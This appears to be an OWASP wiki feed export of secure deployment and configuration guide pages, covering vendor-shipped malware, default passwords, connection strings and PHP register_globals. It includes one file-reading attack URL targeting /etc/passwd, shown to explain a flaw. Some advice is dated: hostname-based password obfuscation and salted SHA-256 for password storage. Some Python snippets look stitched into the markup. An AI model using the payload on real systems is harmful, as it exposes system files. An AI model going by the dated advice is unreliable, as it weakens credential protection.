&amp;lt;u&amp;gt;http://www.sysinternals.com/blog/2005/10/sony-rootkits-and-digital-rights.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Sony has a voluntary recall program for XCP infected disks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://cp.sonybmg.com/xcp/&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Settlement details of at least ten class action lawsuits against Sony:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.eff.org/IP/DRM/Sony-BMG/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Microsoft distributes macro viruses on CD&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.f-secure.com/v-descs/wazzu.shtml&amp;lt;/u&amp;gt;   &lt;br /&gt;
&lt;br /&gt;
==Links==&lt;br /&gt;
[[Guide Table of Contents| Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Activity]]&lt;br /&gt;
[[Category:Deployment]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Deployment&amp;diff=60008</id>
		<title>Deployment</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Deployment&amp;diff=60008"/>
				<updated>2009-05-04T12:25:53Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Malicious software */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Stub}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents| Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
Deployment is the first and sometimes the only experience system administrators will have with your application. Customers who buy or use your application appreciate the lower costs of securely deployed software – if their system administrators do not have to spend hours or days securing your software, they are far more likely to choose your software over an insecure competitor. &lt;br /&gt;
&lt;br /&gt;
Ease of deployment is a key consideration for many highly available or highly changeable systems. Systems have a special knack of buying the farm at 3 am Monday morning before the busiest day of the year. If your application can be trivially installed at 3 am by tired and emotional system administrators, they will remember you fondly when the time comes for new software or the next version. The worst case alternative is that your customers may not be around if your software takes three days to install. &lt;br /&gt;
&lt;br /&gt;
Secure deployment is essential for high value systems. High value systems require controls in excess of basic software. This chapter guides you through packaging and deployment issues.&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that the application is deployed as easily and as securely as possible.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
* Software should have automated installers and provide automated uninstallers&lt;br /&gt;
&lt;br /&gt;
* Software should deploy using a least privilege security model&lt;br /&gt;
&lt;br /&gt;
* Software should not expose any secrets once installed&lt;br /&gt;
&lt;br /&gt;
* Documentation should not contain any default accounts, nor should the installer contain any pre-chosen or default accounts&lt;br /&gt;
&lt;br /&gt;
* Every configuration parameter must be documented and discoverable&lt;br /&gt;
&lt;br /&gt;
==Release Management ==&lt;br /&gt;
&lt;br /&gt;
Release management is a formal process designed to ensure that applications are released in a tested and controlled fashion. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Is release management in place? If so, does it cover:&lt;br /&gt;
&lt;br /&gt;
* Deployment testing&lt;br /&gt;
&lt;br /&gt;
* Acceptance testing&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Read software quality assurance references &lt;br /&gt;
&lt;br /&gt;
* Write deployment instructions&lt;br /&gt;
&lt;br /&gt;
* Eliminate all steps that can be automated&lt;br /&gt;
&lt;br /&gt;
* Implement a deployment acceptance test&lt;br /&gt;
&lt;br /&gt;
==Secure delivery of code ==&lt;br /&gt;
&lt;br /&gt;
Attackers have been known to send malicious code to end users, so it is vital that your users and customers can obtain your software in a secure fashion. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Secure delivery of code is relatively simple to test, and even easier to rectify. &lt;br /&gt;
&lt;br /&gt;
* Pretend to be a normal customer. Obtain your software in the usual fashion.&lt;br /&gt;
&lt;br /&gt;
* Was it obtained from a retailer or other distributor in hard format? If so, does the software contain instructions on how to validate it against legitimate deliveries?&lt;br /&gt;
&lt;br /&gt;
* Does the media contain any viruses or harmful code?&lt;br /&gt;
&lt;br /&gt;
* Was it obtained from a third party download site? If so, does it contain an accurate link back to your site?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Secure &lt;br /&gt;
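One widely used safeguard, offered here as an illustrative sketch rather than a requirement of this guide, is to publish a cryptographic checksum for each release so customers can verify the file they actually downloaded. The function names below are hypothetical.&lt;br /&gt;

```python
import hashlib
import hmac

def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 and return its hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_download(path: str, published_digest: str) -> bool:
    """Compare a downloaded file against the digest published by the vendor."""
    return hmac.compare_digest(sha256_of(path), published_digest.lower())
```

Publishing the digest over a separate, authenticated channel (e.g. an HTTPS page on your own site) is what makes the comparison meaningful.&lt;br /&gt;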
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Code signing  ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
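This section is empty in the original; as a hedged illustration of the detached-signature idea behind code signing, the sketch below uses a keyed MAC from Python's standard library. Real code signing uses asymmetric keys and established tooling (e.g. GPG or Authenticode); the function names here are illustrative only.&lt;br /&gt;

```python
import hashlib
import hmac

def sign(data: bytes, key: bytes) -> str:
    """Produce a detached tag over a release artifact (MAC stand-in for a real signature)."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()

def verify(data: bytes, key: bytes, signature: str) -> bool:
    """Check a detached tag in constant time; any tampering invalidates it."""
    return hmac.compare_digest(sign(data, key), signature)
```

With asymmetric signing, only the vendor holds the signing key while anyone can verify, which is why it is preferred for distribution.&lt;br /&gt;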
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Permissions are set to least privilege ==&lt;br /&gt;
The application owner must use a different account than the system administrator; only the system administrator should have access to the root password. &lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
* Every employee can log in with the root/admin account&lt;br /&gt;
* Deployment procedures require system privileges&lt;br /&gt;
* The live application requires system privileges to start&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
* Create a dedicated user for each application&lt;br /&gt;
* Run every application with least privilege&lt;br /&gt;
* Ensure deploy and start commands do not require root/admin privileges&lt;br /&gt;
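The bullets above can be enforced with a startup guard; this is a minimal sketch, assuming a hypothetical dedicated account named "myapp".&lt;br /&gt;

```python
APP_USER = "myapp"  # hypothetical dedicated service account name

def may_start(euid: int, username: str) -> bool:
    """Refuse to start as root (euid 0) or under anything but the app's own account."""
    return euid != 0 and username == APP_USER
```

On a POSIX system this would be called at startup as, for example, may_start(os.geteuid(), getpass.getuser()).&lt;br /&gt;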
&lt;br /&gt;
==Automated packaging ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Automated deployment ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Automated removal ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==No backup or old files ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Unnecessary features are off by default ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Setup log files are clean ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==No default accounts ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
* Identify the default user accounts that are standard with the product you are using.&lt;br /&gt;
* Run periodic tests to ensure none of the accounts you identify are enabled or exist.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
* Never generate common or default credentials.&lt;br /&gt;
* Always remove any default user accounts from the server and applications prior to deployment.&lt;br /&gt;
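The periodic test described above can be automated; a minimal sketch follows, where the list of well-known default account names is illustrative and should be replaced with the defaults documented for your actual products.&lt;br /&gt;

```python
# Illustrative list only; populate from your vendors' documentation.
KNOWN_DEFAULT_ACCOUNTS = {"admin", "administrator", "guest", "test", "sa", "scott"}

def default_accounts_present(usernames):
    """Return any well-known default accounts found in the deployed user list."""
    return sorted(KNOWN_DEFAULT_ACCOUNTS & {name.lower() for name in usernames})
```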
&lt;br /&gt;
==Easter eggs ==&lt;br /&gt;
&lt;br /&gt;
Easter eggs are hidden features, usually small but sometimes substantial. Often they contain the developers' names or activate hidden advanced or developer features, but occasionally they are more like mini-applications. For the most part, they have no business function.  &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
''Figure 7 Adobe InDesign CS SVG Easter Egg''&lt;br /&gt;
&lt;br /&gt;
Easter eggs are fairly popular with developers, but they are problematic from a software engineering and legal viewpoint. Unless sufficiently designed and tested, easter eggs can cause the application to crash or misbehave. For example, Word 97 contained a pinball game and Excel 97 a small flight simulator. If these crashed with unsaved data, the application was not acting within design parameters, opening up liability. &lt;br /&gt;
&lt;br /&gt;
However, there is a case for including debug functionality, as long as it is tested, not enabled by default, and is documented within the user or administration manual. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
It is almost impossible to prevent clever developers from adding easter eggs, so look for undocumented features during code review.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Malicious software ==&lt;br /&gt;
&lt;br /&gt;
The history of software delivery is littered with examples of products shipped with something more than the users bargained for. &lt;br /&gt;
&lt;br /&gt;
Examples include:&lt;br /&gt;
&lt;br /&gt;
* Sony delivered First 4 Internet's XCP (Extended Copy Protection) rootkit on millions of audio disks, infecting at least half a million PCs. Major legal problems have ensued, and set copy prohibition technologies back at least five years&lt;br /&gt;
&lt;br /&gt;
* Microsoft through a lack of a quality assured distribution process (now resolved), distributed viruses on multiple occasions, such as the Word macro viruses Concept and Wazzu&lt;br /&gt;
&lt;br /&gt;
* Microsoft partner and premium support web sites were distributing Hotfixes with the FunLove virus in 2001&lt;br /&gt;
&lt;br /&gt;
* Hewlett-Packard had the FunLove virus on their web site, in 2000 and also 2006. Though in 2006 it was a printer that was no longer made and the Korean version of Windows 95 drivers for it, so not as big a deal as in 2000&lt;br /&gt;
&lt;br /&gt;
* Linux kernel with a backdoor was submitted to CVS tree in November 2003. It was spotted (by Larry McVoy) because it had been placed directly into CVS, not via  BitKeeper&lt;br /&gt;
&lt;br /&gt;
These examples show that distributing malicious software is highly embarrassing and extremely expensive to resolve (in Sony’s case, hundreds of millions of dollars), yet such incidents are often trivial to prevent. &lt;br /&gt;
&lt;br /&gt;
In the past, there has been much confusion over the legal status of 'spyware' (e.g. software written so an employer can monitor employees) and 'adware' (e.g. software that reports back which of a company's sites have been visited, or changes keywords in search results). Often these have been distributed with free software, with the user agreeing, via vague and deliberately verbose legal agreements, that they may be installed. Usually the adware is described as a way to 'boost' the user's shopping experience, or it is mentioned that information may be sent back to 'assist in our marketing' or that of partners. This makes it sound akin to web cookies, with little effect on system performance and no privacy issues over what is sent back. However, now that the public is becoming more aware of adware, the legal distinctions are clearer, and the IT security community is quickly learning which adware companies are prepared to play ball (making their warning notices more useful and their software less covert) and which continue to write software that violates the user's privacy and drains system resources.&lt;br /&gt;
&lt;br /&gt;
In most countries, it is now illegal to create, distribute, and use software that acts in a surreptitious and devious manner. Users will remember any vendor attempting such criminal sabotage and never buy from such vendors again. Sony is an excellent case of this; the rootkit scandal has done their reputation a great deal of damage. In Australia, such criminal acts are punishable with fines of up to $250,000 per infected computer, and up to 10 years imprisonment. Similar statutes and punishments exist in most countries. &lt;br /&gt;
&lt;br /&gt;
'''OWASP is not a source of legal advice; if you think your software flies close to the wind, you must seek competent legal opinion. Even better, do not create or distribute such software. Karma will bite you on the flip side. '''&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Does your software contain any malicious code that performs unauthorized or damaging activity, such as Sony’s rootkit? If so, remove it. &lt;br /&gt;
&lt;br /&gt;
Did you check your final software image for known:&lt;br /&gt;
&lt;br /&gt;
* viruses using at least one up to date virus scanner?&lt;br /&gt;
&lt;br /&gt;
* spyware using at least one up to date spyware scanner?&lt;br /&gt;
&lt;br /&gt;
You may also wish to check for rootkits as there are specific tools now available to do that, at least on the Windows and Unix platforms. &lt;br /&gt;
&lt;br /&gt;
Be aware that there are many free spyware scanners available which are not to be trusted. They may surreptitiously install spyware, then when they 'find' it,&lt;br /&gt;
advise that you need to buy the commercial version to be able to remove it. This situation will hopefully improve now that more antivirus and security software companies are building integrated solutions that detect spyware as well as viruses and worms. In the meantime, stick with the more well-known spyware detection software.&lt;br /&gt;
&lt;br /&gt;
Is it possible for an auditor to determine when this scan took place?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Do not create or distribute malicious software – it is illegal in most countries.&lt;br /&gt;
&lt;br /&gt;
Scan your final distribution images and media with at least one up to date virus scanner and at least one spyware checker. Document in your manual the date of this scan and the software used.&lt;br /&gt;
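To make the scan date auditable, the record can be emitted in a machine-readable form; a minimal sketch, with hypothetical field names, follows.&lt;br /&gt;

```python
import datetime
import json

def scan_record(tool: str, version: str, result: str) -> str:
    """Emit an auditable JSON record of when, and with what tool, the image was scanned."""
    return json.dumps({
        "tool": tool,
        "version": version,
        "result": result,
        "scanned_at": datetime.datetime.now(datetime.timezone.utc).isoformat(),
    })
```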
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
===Deploying applications  ===&lt;br /&gt;
&lt;br /&gt;
* (PHP) Deploying PHP web applications with Ant:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onlamp.com/pub/a/php/2005/12/20/php_ant.html&amp;lt;/u&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
* (J2EE) Deploying for the web using Ant:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/excerpt/AntTDG_chap8/index.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/excerpt/AntTDG_chap8/index1.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Apple MacOS X) Package Maker&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://developer.apple.com/tools/installerpolicy.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Many Linux distros) Redhat Package Manager (RPM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.rpm.org/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Fedora and Red Hat Enterprise Linux) Yellowdog Update Manager (YUM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://linux.duke.edu/projects/yum/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Debian, and MacOS X using Fink) Advanced Packaging Tool&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.debian.org/doc/manuals/apt-howto/index.en.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Solaris) Application Packaging Developer’s Guide&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://docs.sun.com/app/docs/doc/806-7008/&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Solaris) Blastwave is a project to encourage sharing of free software for Solaris 8, 9 and 10.  Also called Community Software for Solaris (CSW); the end-user uses the pkg-get tool to install packages.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.blastwave.org/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (FreeBSD) Ports and Packages Collection &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.freebsd.org/ports/index.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Win32, .NET, any framework where xcopy works as a deployment tool)&lt;br /&gt;
&lt;br /&gt;
Microsoft Windows Installer XML (wix), a free Windows installer creator&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://sourceforge.net/projects/wix&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Examples of bad deployment practices ===&lt;br /&gt;
&lt;br /&gt;
Sony’s rootkit settlement will cost the company more than $150 million and has seriously set back its anti-consumer copy prohibition agenda&lt;br /&gt;
&lt;br /&gt;
* Sony, Rootkits and Digital Rights Management Gone Too Far:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.sysinternals.com/blog/2005/10/sony-rootkits-and-digital-rights.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Sony has a voluntary recall program for XCP infected disks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://cp.sonybmg.com/xcp/&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Settlement details of at least ten class action lawsuits against Sony:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.eff.org/IP/DRM/Sony-BMG/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Microsoft distributes macro viruses on CD&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.f-secure.com/v-descs/wazzu.shtml&amp;lt;/u&amp;gt;   &lt;br /&gt;
&lt;br /&gt;
==Links==&lt;br /&gt;
[[Guide Table of Contents| Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Activity]]&lt;br /&gt;
[[Category:Deployment]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Configuration&amp;diff=59981</id>
		<title>Configuration</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Configuration&amp;diff=59981"/>
				<updated>2009-05-03T21:37:00Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* How to protect yourself */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To produce applications which are secure out of the box.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS6 – Manage Changes – All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
Turn off all unnecessary features by default&lt;br /&gt;
&lt;br /&gt;
* Ensure that all switches and configuration for every feature is configured initially to be the safest possible choice.&lt;br /&gt;
&lt;br /&gt;
* Inspect the design to see if the less safe choices could be designed in another way. For example, password reset systems are intrinsically unsound from a security point of view. If you do not ship this component, your application’s users will be safer.&lt;br /&gt;
&lt;br /&gt;
* Do not rely on optionally installed features in the base code.&lt;br /&gt;
&lt;br /&gt;
* Do not configure anything in preparation for an optionally deployable feature.&lt;br /&gt;
&lt;br /&gt;
==Default passwords ==&lt;br /&gt;
&lt;br /&gt;
Applications often ship with well-known passwords. In a particularly excellent effort, NGS Software determined that Oracle’s “Unbreakable” database server contained 168 default passwords out of the box. Obviously, changing this many credentials every time an application server is deployed is out of the question, nor should it be necessary.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Inspect the application’s manifest and ensure that no passwords are included in any form, whether within the source files, compiled into the code, or as part of the configuration.&lt;br /&gt;
&lt;br /&gt;
* Inspect the application for usernames and passwords. Ensure that diagrams also do not have any.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Do not ship the product with any configured accounts.&lt;br /&gt;
&lt;br /&gt;
* Do not hard code any backdoor accounts or special access mechanisms.&lt;br /&gt;
&lt;br /&gt;
==Secure connection strings ==&lt;br /&gt;
&lt;br /&gt;
Connection strings to the database are rarely encrypted. However, an attacker who has gained shell access can use them to perform direct operations against the database or back-end systems, providing a stepping stone to total compromise. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Check your framework’s configuration file, registry settings, and any application based configuration file (usually config.php, etc) for clear text connection strings to the database.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Sometimes, storing no password at all (for example, by using integrated authentication) is preferable to storing a clear text password.&lt;br /&gt;
&lt;br /&gt;
* On the Win32 platform, use “TrustedConnection=yes”, and create the DSN with a stored credential. The credential is stored as an LSA Secret, which is not perfect, but is better than clear text passwords.&lt;br /&gt;
&lt;br /&gt;
* Develop a method to obfuscate the password in some form, such as “encrypting” it using the hostname or similar within code in a non-obvious way.&lt;br /&gt;
&lt;br /&gt;
* Ask the database developer to provide a library which allows remote connections using a password hash instead of a clear text credential.&lt;br /&gt;
&lt;br /&gt;
==Secure network transmission ==&lt;br /&gt;
&lt;br /&gt;
By default, no unencrypted data should transit the network. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Use a packet capture tool, such as Ethereal, and mirror a switch port near the database or application servers.&lt;br /&gt;
&lt;br /&gt;
* Sniff the traffic for a while and determine your exposure to an attacker performing this exact same task.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use SSL, SSH and other forms of encryption (such as encrypted database connections) to prevent data from being intercepted or interfered with over the wire.&lt;br /&gt;
&lt;br /&gt;
==Encrypted data ==&lt;br /&gt;
&lt;br /&gt;
Some information security policies and standards require the database on-disk data to be encrypted. However, this is essentially useless if the database connection allows clear text access to the data. What is more important is the obfuscation and one-way encryption of sensitive data.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Highly protected applications:&lt;br /&gt;
&lt;br /&gt;
* Is there a requirement to encrypt certain data?&lt;br /&gt;
&lt;br /&gt;
* If so, is it “encrypted” in such a fashion that allows a database administrator to read it without knowing the key?&lt;br /&gt;
&lt;br /&gt;
If so, the “encryption” is useless and another approach is required.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Highly protected applications and any application that has a requirement to encrypt data:&lt;br /&gt;
&lt;br /&gt;
* Passwords should only be stored in a non-reversible format, such as a salted SHA-256 hash or similar&lt;br /&gt;
&lt;br /&gt;
* Sensitive data like credit cards should be carefully considered – do they have to be stored at all? '''The PCI guidelines are very strict''' '''on the storage of credit card data'''. '''We strongly recommend against it. '''&lt;br /&gt;
&lt;br /&gt;
* Encrypted data should not have the key on the database server. &lt;br /&gt;
&lt;br /&gt;
The last measure forces an attacker to take control of two machines in order to bulk-decrypt data. The encryption key should be able to be changed on a regular basis, and the algorithm should be strong enough to protect the data for as long as it remains sensitive. For example, there is no point in using 56-bit DES today; data should be encrypted using AES-128 or better.&lt;br /&gt;
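&lt;br /&gt;
As a minimal sketch of the non-reversible password storage recommended above (using PHP's built-in hash() function; the salt handling is illustrative):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// Store a salted, non-reversible SHA-256 hash instead of the password&lt;br /&gt;
&lt;br /&gt;
function hashPassword($sPassword, $sSalt)&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	return hash('sha256', $sSalt . $sPassword);&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To verify a login, hash the supplied password with the stored salt and compare the result to the stored hash; the clear text password itself is never written to the database.&lt;br /&gt;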
&lt;br /&gt;
==PHP Configuration ==&lt;br /&gt;
&lt;br /&gt;
==Global variables  ==&lt;br /&gt;
&lt;br /&gt;
Variables declared outside of functions are considered global by PHP. Conversely, a variable declared inside a function is in local function scope. PHP handles global variables quite differently from languages like C. In C, a global variable is always available in local scope as well as global, as long as it is not overridden by a local definition. In PHP things are different: to access a global variable from local scope, you have to declare it global in that scope. The following example shows this:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
$sTitle = 'Page title'; // Global scope&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
function printTitle()&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	global $sTitle; // Declare the variable as global&lt;br /&gt;
&lt;br /&gt;
	echo $sTitle; // Now we can access it just like it was a local variable&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All variables in PHP are represented by a dollar sign followed by the name of the variable. The names are case-sensitive and must start with a letter or underscore, followed by any number of letters, numbers, or underscores.&lt;br /&gt;
&lt;br /&gt;
==register_globals ==&lt;br /&gt;
&lt;br /&gt;
The register_globals directive makes input from GET, POST and COOKIE, as well as session variables and uploaded files, directly accessible as global variables in PHP. This single directive, if set in php.ini, is the root of many vulnerabilities in web applications. 	 &lt;br /&gt;
&lt;br /&gt;
Let's start by having a look at an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
if ($bIsAlwaysFalse) &lt;br /&gt;
&lt;br /&gt;
{ &lt;br /&gt;
&lt;br /&gt;
	// This is never executed:&lt;br /&gt;
&lt;br /&gt;
	$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
//       ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' )   &lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send its contents to the browser&lt;br /&gt;
&lt;br /&gt;
	//		... &lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
If we were to call this page as '''''page.php?sFilename=/etc/passwd''''' with register_globals set, it would be the same as writing the following:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
$sFilename = '/etc/passwd'; // This is done internally by PHP       &lt;br /&gt;
&lt;br /&gt;
if ( $bIsAlwaysFalse )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// This is never executed:&lt;br /&gt;
&lt;br /&gt;
	$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send its contents to the browser&lt;br /&gt;
&lt;br /&gt;
	// ...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
PHP takes care of the '''''$sFilename = '/etc/passwd';''''' part for us. What this means is that a malicious user could inject his/her own value for $sFilename and view any file readable under the current security context. &lt;br /&gt;
&lt;br /&gt;
We should always consider the “what if” when writing code. Turning off register_globals might seem like a solution, but what if our code ends up on a server with register_globals on? We must bear in mind that all variables in global scope could have been tampered with. The correct way to write the above code is to make sure that we always assign a value to '''''$sFilename''''': &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// We initialize $sFilename to an empty string&lt;br /&gt;
&lt;br /&gt;
$sFilename = '';&lt;br /&gt;
&lt;br /&gt;
if ( $bIsAlwaysFalse )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// This is never executed:&lt;br /&gt;
&lt;br /&gt;
